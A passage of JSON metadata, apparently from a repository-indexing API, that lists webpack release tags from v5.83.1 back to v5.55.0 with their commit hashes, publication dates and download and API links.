dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.83.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.1/manifests"},{"name":"v5.83.0","sha":"ccb3b860520c9472eff3d411a48105f882cf482a","kind":"tag","published_at":"2023-05-17T15:29:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.83.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.0/manifests"},{"name":"v5.82.1","sha":"a8fd8b7598e8a599871765e0167cacf8318944a9","kind":"tag","published_at":"2023-05-10T15:36:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.82.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.82.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.82.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.1/manifests"},{"name":"v5.82.0","sha":"1018ca80b31ea72436510398cca5be335b6ac81c","kind":"tag","published_at":"2023-05-03T17:03:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.82.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.0/manifests"},{"name":"v5.81.0","sha":"5c016a8ec1bbfd73a7fc20d4b474938e61ee3a57","kind":"tag","published_at":"2023-04-26T14:41:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.81.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.81.0/manifests"},{"name":"v5.80.0","sha":"9ac1728ee359efbbd1eb317f4a12c0f8136a690e","kind":"tag","published_at":"2023-04-19T16:56:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.80.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.80.0/manifests"},{"name":"v5.79.0","sha":"ecdcc1a1d02a3097acb9ebc0896365ae1f4d25e2","kind":"tag","published_at":"2023-04-12T15:12:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.79.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.79.0/manifests"},{"name":"v5.78.0","sha":"e51f8347026588c90f9bd91681597e97f24f40c9","kind":"tag","published_at":"2023-04-05T18:09:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.78.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.78.0/manifests"},{"name":"v5.77.0","sha":"263f29189060529198b7ab4dbddfd2dca46bd96e","kind":"tag","published_at":"2023-03-29T14:19:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.77.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.77.0/manifests"},{"name":"v5.76.3","sha":"8ac9616280aebfb61ae7484f06ad1979d73e6a56","kind":"tag","published_at":"2023-03-22T14:59:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.3/manifests"},{"name":"v5.76.2","sha":"dbf7bf39ab96e1462603435c150d601bb69ebe4e","kind":"tag","published_at":"2023-03-15T15:00:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.2/manifests"},{"name":"v5.76.1","sha":"21be52b681c477f8ebc41c1b0e7a7a8ac4fa7008","kind":"commit","published_at":"2023-03-10T22:59:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.1/manifests"},{"name":"v5.76.0","sha":"97b1718720c33f1b17302a74c5284b01e02ec001","kind":"commit","published_at":"2023-03-08T17:17:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.0/manifests"},{"name":"v5.75.0","sha":"8241da7f1e75c5581ba535d127fa66aeb9eb2ac8","kind":"tag","published_at":"2022-11-09T15:27:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.75.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.75.0/manifests"},{"name":"v5.74.0","sha":"8f87b50dc7ac24eb5c91fd0d55a22e34e252863c","kind":"tag","published_at":"2022-07-25T08:00:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.74.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.74.0/manifests"},{"name":"v5.73.0","sha":"36051a5ca77b4fa33fac651e1af650c7b910a873","kind":"tag","published_at":"2022-06-02T11:24:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.73.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.73.0/manifests"},{"name":"v5.72.1","sha":"08ecfbbc035b12f2ed5c0b83b53011dfe57ae7c9","kind":"tag","published_at":"2022-05-10T10:41:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.72.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.72.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.72.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.1/manifests"},{"name":"v5.72.0","sha":"d3a0f8de03f26a83b4d5db3cfe177617a3801df3","kind":"tag","published_at":"2022-04-07T12:36:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.72.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.0/manifests"},{"name":"v5.71.0","sha":"c2079f7e7666a913d6fdad4b9102ffb0d3801cc8","kind":"tag","published_at":"2022-04-01T13:41:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.71.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.71.0/manifests"},{"name":"v5.70.0","sha":"5a26b7c4a923c42022ca97fe9cbf46907a20d6d8","kind":"tag","published_at":"2022-03-03T14:23:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.70.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.70.0/manifests"},{"name":"v5.69.1","sha":"dfdc8b133d3d49371251e29efeefb9d31b982c9e","kind":"tag","published_at":"2022-02-17T13:46:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.69.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.69.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.69.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.1/manifests"},{"name":"v5.69.0","sha":"9d21401151b32abcefad0ffdb3238da91e2089ef","kind":"tag","published_at":"2022-02-15T12:33:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.69.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.0/manifests"},{"name":"v5.68.0","sha":"f593d98453e7920bf65f24bf051cd67b5704b59d","kind":"tag","published_at":"2022-01-31T16:25:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.68.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.68.0/manifests"},{"name":"v5.67.0","sha":"4abe329dcdaea60371c03c0d85c3a3994d875138","kind":"tag","published_at":"2022-01-21T17:44:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.67.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.67.0/manifests"},{"name":"v5.66.0","sha":"0105bc1f005d78e3819a567ffb91432683569070","kind":"tag","published_at":"2022-01-12T08:23:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.66.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.66.0/manifests"},{"name":"v5.65.0","sha":"323d65e2b1f6d275bf1b4a93ef753f027de78193","kind":"tag","published_at":"2021-12-06T13:57:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.65.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.65.0/manifests"},{"name":"v5.64.4","sha":"d3cd4cb6e38338237fe722d4b7feae2244c425c5","kind":"tag","published_at":"2021-11-25T15:49:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.4/manifests"},{"name":"v5.64.3","sha":"c66e4ce32027fd31935ce9197c219e46308ebd3f","kind":"tag","published_at":"2021-11-24T08:27:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.3/manifests"},{"name":"v5.64.2","sha":"0065223c4ddac3bf872bc8d660ef1e9a63afa080","kind":"tag","published_at":"2021-11-20T13:43:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.2/manifests"},{"name":"v5.64.1","sha":"3d5503a5b535b89bbdde78535c1839cefd88e4fa","kind":"tag","published_at":"2021-11-15T17:16:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.1/manifests"},{"name":"v5.64.0","sha":"789e58514b5747f6474bc247e4e104ce22892a2c","kind":"tag","published_at":"2021-11-11T14:16:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.0/manifests"},{"name":"v5.63.0","sha":"f011c70aacbd4dd3c4e518b9b9d8ea945dce0a9a","kind":"tag","published_at":"2021-11-09T19:30:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.63.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.63.0/manifests"},{"name":"v5.62.2","sha":"3aed1fe0249f8730a35fab62e3cdc3b399b0b6e9","kind":"tag","published_at":"2021-11-09T11:12:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.2/manifests"},{"name":"v5.62.1","sha":"daba59b3d60e7895543b6563682c209e4ad6b8b8","kind":"tag","published_at":"2021-11-05T16:26:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.1/manifests"},{"name":"v5.62.0","sha":"04640dcc757c8b3e78c6cbf6e4dda7cbbde33fe2","kind":"tag","published_at":"2021-11-05T14:56:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.0/manifests"},{"name":"v5.61.0","sha":"0306510f7d1b9b13900f1dcf78a767c2ed390a61","kind":"tag","published_at":"2021-10-29T14:00:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.61.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.61.0/manifests"},{"name":"v5.60.0","sha":"f0298fe46fc22eebf42eb034a9435d7c19aeddd9","kind":"tag","published_at":"2021-10-25T16:20:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.60.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.60.0/manifests"},{"name":"v5.59.1","sha":"3dbbdcb28cce3860247f06a18e48f536ab266834","kind":"tag","published_at":"2021-10-20T21:39:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.59.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.59.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.59.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.1/manifests"},{"name":"v5.59.0","sha":"19ca23f062544263f48d2947da0ecfb29ae0bb36","kind":"tag","published_at":"2021-10-19T17:54:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.59.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.0/manifests"},{"name":"v5.58.2","sha":"8a6d156c156282dd3d0ba001187c282402a1177f","kind":"tag","published_at":"2021-10-13T09:39:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.2/manifests"},{"name":"v5.58.1","sha":"2eecffb2739d13d3095568d118ffc0baacec5cd8","kind":"tag","published_at":"2021-10-08T13:41:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.1/manifests"},{"name":"v5.58.0","sha":"7666277551be32947227e80fb2fccdbbe656254b","kind":"tag","published_at":"2021-10-07T15:48:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.0/manifests"},{"name":"v5.57.1","sha":"0581bb3c1c32bcb3e182a0f732b862a6c5bb7846","kind":"tag","published_at":"2021-10-05T18:25:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.57.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.57.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.57.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.1/manifests"},{"name":"v5.57.0","sha":"e841ab01417f8e1dd6a2533638f848b5ad0c7d16","kind":"tag","published_at":"2021-10-05T15:06:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.57.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.0/manifests"},{"name":"v5.56.1","sha":"ed55e200efb0dad7716d509c82a6ed82aee86c51","kind":"tag","published_at":"2021-10-04T07:32:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.56.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.56.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.56.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.1/manifests"},{"name":"v5.56.0","sha":"4eb122092d9696ac5286bc2dcf3eacfb901f4fed","kind":"tag","published_at":"2021-10-01T14:12:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.56.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.0/manifests"},{"name":"v5.55.1","sha":"e78403d6a8d4e682fbd4a0eb58f042866cfde42a","kind":"tag","published_at":"2021-09-29T08:56:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.55.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.55.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.55.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.1/manifests"},{"name":"v5.55.0","sha":"5db30851c7ed007d8f94150ee2c6a1b47d10d388","kind":"tag","published_at":"2021-09-28T17:39:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.55.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.0","manifests_url":"https://repos.